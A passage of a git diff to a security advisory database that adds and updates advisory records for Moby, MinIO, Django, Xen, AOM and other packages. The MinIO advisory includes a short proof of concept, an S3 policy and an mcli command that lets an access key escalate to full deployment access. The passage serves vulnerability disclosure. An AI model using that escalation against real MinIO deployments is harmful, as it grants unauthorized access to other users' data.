] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/rancher/rancher/security/advisories/GHSA-xfj7-qf8w-2gcr" + }, + { + "type": "PACKAGE", + "url": "https://github.com/rancher/rancher" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-532" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-08T18:44:25Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json b/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json new file mode 100644 index 0000000000000..3f4436750566e --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xw73-rw38-6vjc/GHSA-xw73-rw38-6vjc.json @@ -0,0 +1,93 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xw73-rw38-6vjc", + "modified": "2024-02-01T20:51:19Z", + "published": "2024-02-01T20:51:19Z", + "aliases": [ + "CVE-2024-24557" + ], + "summary": "Moby vulnerable to classic builder cache poisoning", + "details": "The classic builder cache system is prone to cache poisoning if the image is built `FROM scratch`.\nAlso, changes to some instructions (most important being `HEALTHCHECK` and `ONBUILD`) would not cause a cache miss.\n\n\nAn attacker with the knowledge of the Dockerfile someone is using could poison their cache by making them pull a specially crafted image that would be considered as a valid cache candidate for some build steps.\n\nFor example, an attacker could create an image that is considered as a valid cache candidate for:\n```\nFROM scratch\nMAINTAINER Pawel\n```\n\nwhen in fact the malicious image used as a cache would be an image built from a different Dockerfile.\n\nIn the second case, the attacker could for example substitute a different `HEALTCHECK` command.\n\n\n### Impact\n\n23.0+ users are only affected if they explicitly opted out of Buildkit (`DOCKER_BUILDKIT=0` environment variable) or are using the `/build` API endpoint (which uses the classic builder by default).\n\nAll users on versions older than 23.0 could be impacted. An example could be a CI with a shared cache, or just a regular Docker user pulling a malicious image due to misspelling/typosquatting.\n\nImage build API endpoint (`/build`) and `ImageBuild` function from `github.com/docker/docker/client` is also affected as it the uses classic builder by default. \n\n\n### Patches\n\nPatches are included in Moby releases:\n\n- v25.0.2\n- v24.0.9\n\n### Workarounds\n\n- Use `--no-cache` or use Buildkit if possible (`DOCKER_BUILDKIT=1`, it's default on 23.0+ assuming that the buildx plugin is installed).\n- Use `Version = types.BuilderBuildKit` or `NoCache = true` in `ImageBuildOptions` for `ImageBuild` call.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:N/UI:R/S:C/C:L/I:H/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "25.0.0" + }, + { + "fixed": "25.0.2" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/moby" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "24.0.9" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/moby/security/advisories/GHSA-xw73-rw38-6vjc" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24557" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/3e230cfdcc989dc524882f6579f9e0dac77400ae" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fca702de7f71362c8d103073c7e4a1d0a467fadd" + }, + { + "type": "WEB", + "url": "https://github.com/moby/moby/commit/fce6e0ca9bc000888de3daa157af14fa41fcd0ff" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/moby" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-345", + "CWE-346" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T20:51:19Z", + "nvd_published_at": "2024-02-01T17:15:10Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json b/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json new file mode 100644 index 0000000000000..a5d859dbbc36b --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xx8w-mq23-29g4/GHSA-xx8w-mq23-29g4.json @@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xx8w-mq23-29g4", + "modified": "2024-02-01T22:52:18Z", + "published": "2024-02-01T19:21:30Z", + "aliases": [ + "CVE-2024-24747" + ], + "summary": "Minio unsafe default: Access keys inherit `admin` of root user, allowing privilege escalation", + "details": "### Summary\nWhen someone creates an access key, it inherits the permissions of the parent key. Not only for \n`s3:*` actions, but also `admin:*` actions. Which means unless somewhere above in the \naccess-key hierarchy, the `admin` rights are denied, access keys will be able to simply \noverride their own `s3` permissions to something more permissive.\n\nCredit to @xSke for sort of accidentally discovering this. I only understood the implications.\n\n### Details / PoC\nWe spun up the latest version of minio in a docker container and signed in to the admin UI \nusing the minio root user. We created two buckets, `public` and `private` and created an \naccess key called `mycat` and attached the following policy to only allow access to the \nbucket called `public`.\n\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::public\",\n \"arn:aws:s3:::public/*\"\n ]\n }\n ]\n}\n```\nWe then set an alias in mc: `mcli alias set vuln http://localhost:9001 mycat mycatiscute` \n\nAnd checked whether policy works:\n```\nA ~/c/minio-vuln mcli ls vuln\n[0001-01-01 00:53:28 LMT] 0B public/\n```\nLooks good, we believe this is how 99% of users will work with access policies.\n\nIf I now create a file `full-access-policy.json`:\n```json\n{\n \"Version\": \"2012-10-17\",\n \"Statement\": [\n {\n \"Effect\": \"Allow\",\n \"Action\": [\n \"s3:*\"\n ],\n \"Resource\": [\n \"arn:aws:s3:::*\"\n ]\n }\n ]\n}\n```\nAnd then:\n\n```sh\nA ~/c/minio-vuln mcli admin user svcacct edit --policy full-access-policy.json vuln mycat\nEdited service account `mycat` successfully.\n```\n`mycat` has escalated its privileges to get access to the entire deployment: \n```sh\nA ~/c/minio-vuln mcli ls vuln\n[0001-01-01 00:53:28 LMT] 0B private/\n[0001-01-01 00:53:28 LMT] 0B public/\n```\n\n### Impact\nA trivial privilege escalation unless the operator fully understands that they need to \nexplicitly deny `admin` actions on access keys. \n\n### Patched\n\n```\ncommit 0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776 (HEAD -> master, origin/master)\nAuthor: Aditya Manthramurthy \nDate: Wed Jan 31 10:56:45 2024 -0800\n\n fix: permission checks for editing access keys (#18928)\n \n With this change, only a user with `UpdateServiceAccountAdminAction`\n permission is able to edit access keys.\n \n We would like to let a user edit their own access keys, however the\n feature needs to be re-designed for better security and integration with\n external systems like AD/LDAP and OpenID.\n \n This change prevents privilege escalation via service accounts.\n```\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/minio/minio" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.0.0-20240131185645-0ae4915a9391" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/minio/minio/security/advisories/GHSA-xx8w-mq23-29g4" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24747" + }, + { + "type": "WEB", + "url": "https://github.com/minio/minio/commit/0ae4915a9391ef4b3ec80f5fcdcf24ee6884e776" + }, + { + "type": "PACKAGE", + "url": "https://github.com/minio/minio" + }, + { + "type": "WEB", + "url": "https://github.com/minio/minio/releases/tag/RELEASE.2024-01-31T20-20-33Z" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-269" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-01T19:21:30Z", + "nvd_published_at": "2024-01-31T22:15:54Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json b/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json new file mode 100644 index 0000000000000..6a8902f3a6c13 --- /dev/null +++ b/advisories/github-reviewed/2024/02/GHSA-xxj9-f6rv-m3x4/GHSA-xxj9-f6rv-m3x4.json @@ -0,0 +1,124 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-xxj9-f6rv-m3x4", + "modified": "2024-02-07T17:32:14Z", + "published": "2024-02-07T00:30:25Z", + "aliases": [ + "CVE-2024-24680" + ], + "summary": "Django denial-of-service attack in the intcomma template filter", + "details": "An issue was discovered in Django 3.2 before 3.2.24, 4.2 before 4.2.10, and Django 5.0 before 5.0.2. The intcomma template filter was subject to a potential denial-of-service attack when used with very long strings.", + "severity": [ + + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.2.24" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2" + }, + { + "fixed": "4.2.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "PyPI", + "name": "django" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0" + }, + { + "fixed": "5.0.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24680" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/16a8fe18a3b81250f4fa57e3f93f0599dc4895bc" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/55519d6cf8998fe4c8f5c8abffc2b10a7c3d14e9" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/572ea07e84b38ea8de0551f4b4eda685d91d09d2" + }, + { + "type": "WEB", + "url": "https://github.com/django/django/commit/c1171ffbd570db90ca206c30f8e2b9f691243820" + }, + { + "type": "WEB", + "url": "https://docs.djangoproject.com/en/5.0/releases/security/" + }, + { + "type": "PACKAGE", + "url": "https://github.com/django/django" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/django/PYSEC-2024-28.yaml" + }, + { + "type": "WEB", + "url": "https://groups.google.com/forum/#%21forum/django-announce" + }, + { + "type": "WEB", + "url": "https://www.djangoproject.com/weblog/2024/feb/06/security-releases/" + } + ], + "database_specific": { + "cwe_ids": [ + + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T17:32:14Z", + "nvd_published_at": "2024-02-06T22:16:15Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json b/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json index d34ce6b8b68c5..969b228be0d54 100644 --- a/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json +++ b/advisories/unreviewed/2021/11/GHSA-959p-vvwh-xj92/GHSA-959p-vvwh-xj92.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28708" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json b/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json index 4a412e8905dec..9579411f8385a 100644 --- a/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json +++ b/advisories/unreviewed/2021/11/GHSA-gjrp-cpc9-h4r7/GHSA-gjrp-cpc9-h4r7.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28704" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json b/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json index 181312449e200..2f5d12aa40892 100644 --- a/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json +++ b/advisories/unreviewed/2021/11/GHSA-jpp8-232v-26fc/GHSA-jpp8-232v-26fc.json @@ -21,6 +21,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28707" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/I7ZGWVVRI4XY2XSTBI3XEMWBXPDVX6OT/" @@ -29,6 +37,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PXUI4VMD52CH3T7YXAG3J2JW7ZNN3SXF/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://www.debian.org/security/2021/dsa-5017" diff --git a/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json b/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json index 9f4931d29a10e..107adae14ce22 100644 --- a/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json +++ b/advisories/unreviewed/2021/12/GHSA-2rh7-96qm-4h8w/GHSA-2rh7-96qm-4h8w.json @@ -24,11 +24,16 @@ { "type": "WEB", "url": "https://bugs.chromium.org/p/aomedia/issues/detail?id=2914" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" } ], "database_specific": { "cwe_ids": [ - "CWE-119" + "CWE-119", + "CWE-125" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json b/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json index 1f3d8aa47614f..653a26febe911 100644 --- a/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json +++ b/advisories/unreviewed/2021/12/GHSA-3mrv-v95f-r4rx/GHSA-3mrv-v95f-r4rx.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json b/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json index aacb7ea33f389..91a1f545a9309 100644 --- a/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json +++ b/advisories/unreviewed/2021/12/GHSA-cw3p-3434-gw6r/GHSA-cw3p-3434-gw6r.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json b/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json index faa5e67dc436b..73c5a1b3c65e2 100644 --- a/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json +++ b/advisories/unreviewed/2021/12/GHSA-g8f8-rq6r-4rrh/GHSA-g8f8-rq6r-4rrh.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json b/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json index 46bdd5a26534c..8df856483bb45 100644 --- a/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json +++ b/advisories/unreviewed/2021/12/GHSA-mj29-93c5-p3pr/GHSA-mj29-93c5-p3pr.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-mj29-93c5-p3pr", - "modified": "2021-12-10T00:01:24Z", + "modified": "2024-02-04T09:30:31Z", "published": "2021-12-08T00:01:39Z", "aliases": [ "CVE-2021-28703" ], "details": "grant table v2 status pages may remain accessible after de-allocation (take two) Guest get permitted access to certain Xen-owned pages of memory. The majority of such pages remain allocated / associated with a guest for its entire lifetime. Grant table v2 status pages, however, get de-allocated when a guest switched (back) from v2 to v1. The freeing of such pages requires that the hypervisor know where in the guest these pages were mapped. The hypervisor tracks only one use within guest space, but racing requests from the guest to insert mappings of these pages may result in any of them to become mapped in multiple locations. Upon switching back from v2 to v1, the guest would then retain access to a page that was freed and perhaps re-used for other purposes. This bug was fortuitously fixed by code cleanup in Xen 4.14, and backported to security-supported Xen branches as a prerequisite of the fix for XSA-378.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -18,6 +21,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2021-28703" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-07" + }, { "type": "WEB", "url": "https://xenbits.xenproject.org/xsa/advisory-387.txt" diff --git a/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json b/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json index 08ea4f73e97cc..755b07625fa90 100644 --- a/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json +++ b/advisories/unreviewed/2021/12/GHSA-w6cc-5mpf-4rmj/GHSA-w6cc-5mpf-4rmj.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-w6cc-5mpf-4rmj", - "modified": "2021-12-04T00:01:10Z", + "modified": "2024-01-31T15:30:17Z", "published": "2021-12-03T00:00:27Z", "aliases": [ "CVE-2020-36129" ], "details": "AOM v2.0.1 was discovered to contain a stack buffer overflow via the component src/aom_image.c.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H" + } ], "affected": [ @@ -21,6 +24,10 @@ { "type": "WEB", "url": "https://bugs.chromium.org/p/aomedia/issues/detail?id=2912&q=&can=1" + }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" } ], "database_specific": { diff --git a/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json b/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json index e15ced295503d..18afff9c71f5a 100644 --- a/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json +++ b/advisories/unreviewed/2021/12/GHSA-w9vw-69gr-j5w3/GHSA-w9vw-69gr-j5w3.json @@ -29,6 +29,10 @@ "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/09/msg00003.html" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-32" + }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5490" diff --git a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json index 80a8e013e61fe..328c49aef617e 100644 --- a/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json +++ b/advisories/unreviewed/2022/01/GHSA-cffq-m726-w77f/GHSA-cffq-m726-w77f.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-cffq-m726-w77f", - "modified": "2022-01-27T00:02:01Z", + "modified": "2024-02-03T03:30:26Z", "published": "2022-01-22T00:00:33Z", "aliases": [ "CVE-2021-40247" ], "details": "SQL injection vulnerability in Sourcecodester Budget and Expense Tracker System v1 by oretnom23, allows attackers to execute arbitrary SQL commands via the username field.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json index d8ade344b9b92..c8fa7c59f53d0 100644 --- a/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json +++ b/advisories/unreviewed/2022/02/GHSA-fr63-458q-29q2/GHSA-fr63-458q-29q2.json @@ -1,14 +1,17 @@ { "schema_version": "1.4.0", "id": "GHSA-fr63-458q-29q2", - "modified": "2022-02-10T00:00:50Z", + "modified": "2024-02-02T18:30:23Z", "published": "2022-02-10T00:00:50Z", "aliases": [ "CVE-2021-45429" ], "details": "A Buffer Overflow vulnerablity exists in VirusTotal YARA git commit: 605b2edf07ed8eb9a2c61ba22eb2e7c362f47ba7 via yr_set_configuration in yara/libyara/libyara.c, which could cause a Denial of Service.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H" + } ], "affected": [ diff --git a/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json b/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json deleted file mode 100644 index c05342f7c3f21..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-2mgj-mwvf-mpg5/GHSA-2mgj-mwvf-mpg5.json +++ /dev/null @@ -1,42 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-2mgj-mwvf-mpg5", - "modified": "2022-04-05T00:00:38Z", - "published": "2022-03-30T00:00:24Z", - "aliases": [ - "CVE-2022-28144" - ], - "details": "Jenkins Proxmox Plugin 0.7.0 and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28144" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-29T13:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json b/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json deleted file mode 100644 index 9fc2f56b50c58..0000000000000 --- a/advisories/unreviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "schema_version": "1.4.0", - "id": "GHSA-m9gv-4523-jffm", - "modified": "2022-03-23T00:00:43Z", - "published": "2022-03-16T00:00:44Z", - "aliases": [ - "CVE-2022-27199" - ], - "details": "A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.", - "severity": [ - { - "type": "CVSS_V3", - "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" - } - ], - "affected": [ - - ], - "references": [ - { - "type": "ADVISORY", - "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27199" - }, - { - "type": "WEB", - "url": "https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2351" - }, - { - "type": "WEB", - "url": "http://www.openwall.com/lists/oss-security/2022/03/15/2" - } - ], - "database_specific": { - "cwe_ids": [ - "CWE-276", - "CWE-862" - ], - "severity": "MODERATE", - "github_reviewed": false, - "github_reviewed_at": null, - "nvd_published_at": "2022-03-15T17:15:00Z" - } -} \ No newline at end of file diff --git a/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json b/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json index 3fcb8b25cdee6..598adb6250bf1 100644 --- a/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json +++ b/advisories/unreviewed/2022/03/GHSA-mxm3-g2j6-276p/GHSA-mxm3-g2j6-276p.json @@ -29,6 +29,18 @@ "type": "WEB", "url": "https://lists.debian.org/nbd/2022/01/msg00037.html" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/IZHR73XMAJTCFGKUZRXVTZKCK2X3IFNA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/G2UPX62BIWOOHSACGUDB7E3O4URNN37F/" @@ -41,6 +53,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/PU5JFD4PEJED72TZLZ5R2Q2SFXICU5I5/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202402-10" + }, { "type": "WEB", "url": "https://sourceforge.net/projects/nbd/files/nbd/" diff --git a/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json b/advisories/unreviewed/2022/03/GHSA-q9rw-8758-hccj/GHSA-q9rw-8758-hccj.json index 